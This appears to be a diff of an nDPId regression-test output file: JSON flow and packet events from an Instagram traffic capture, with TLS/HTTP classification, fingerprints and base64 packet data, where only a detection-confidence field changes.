+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1436720908719,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908719,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRgAAEABOq7AqABnwKgAZwMDAwcAAAAARQAAPLKEQABABvFRwKgAZ63CKBTA\/QG7ZKZcEQAAAACgAjkIlxQAAAIEBbQEAggKAAPulQAAAAABAwMG"} 02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprDfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7580000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -131,10 +130,10 @@ 02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIq